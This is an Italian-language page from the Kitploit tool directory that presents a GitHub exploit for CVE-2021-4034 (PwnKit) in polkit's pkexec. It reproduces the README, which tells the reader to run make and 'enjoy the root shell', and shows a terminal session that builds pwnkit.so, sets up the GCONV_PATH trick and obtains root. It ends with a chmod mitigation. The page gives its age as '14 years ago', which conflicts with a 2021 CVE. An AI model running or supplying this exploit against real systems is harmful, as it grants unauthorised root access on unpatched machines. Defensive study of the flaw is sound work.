Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-4034 — # Exploit per CVE-2021-4034 in polkit pkexec, che fornisce una shell di root tramite escalation dei privilegi SUID. Include codice sorgente e istruzioni di compilazione. | Kitploit
Strumenti/GitHubGitHub/tanmay-n/cve-2021-4034
Escalation di PrivilegiFramework di ExploitAnalisi delle VulnerabilitàExploitBinary Exploitation
GitHubtanmay-n/cve-2021-4034

CVE-2021-4034

# Exploit per CVE-2021-4034 in polkit pkexec, che fornisce una shell di root tramite escalation dei privilegi SUID. Include codice sorgente e istruzioni di compilazione.

Vedi Repository
14 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-4034

Exploit per l'escalation dei privilegi di polkit

Basta eseguire make, ./cve-2021-4034 e godersi la shell di root.

L'advisory originale del mio team di Qualys qui

PoC

Se l'exploit funziona, otterrai subito una shell di root:

root@kitploit:~
kali@user:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
kali@user:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit

L'aggiornamento di polkit sulla maggior parte dei sistemi correggerà l'exploit, quindi otterrai l'utilizzo e il programma terminerà:

root@kitploit:~
kali@user:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
       --help |
       --disable-internal-agent |
       [--user username] PROGRAM [ARGUMENTS...]

See the pkexec manual page for more details.
kali@user:~/CVE-2021-4034$

Informazioni su Polkit pkexec per Linux

Polkit (precedentemente PolicyKit) è un componente per il controllo dei privilegi a livello di sistema nei sistemi operativi simili a Unix. Fornisce un modo organizzato per i processi non privilegiati di comunicare con i processi privilegiati. È anche possibile usare polkit per eseguire comandi con privilegi elevati usando il comando pkexec seguito dal comando che si intende eseguire (con permessi di root).

Mitigazione

Se non sono disponibili patch per il tuo sistema operativo, puoi rimuovere il bit SUID da pkexec come mitigazione temporanea.

root@kitploit:~
# chmod 0755 /usr/bin/pkexec
Scarica lo strumento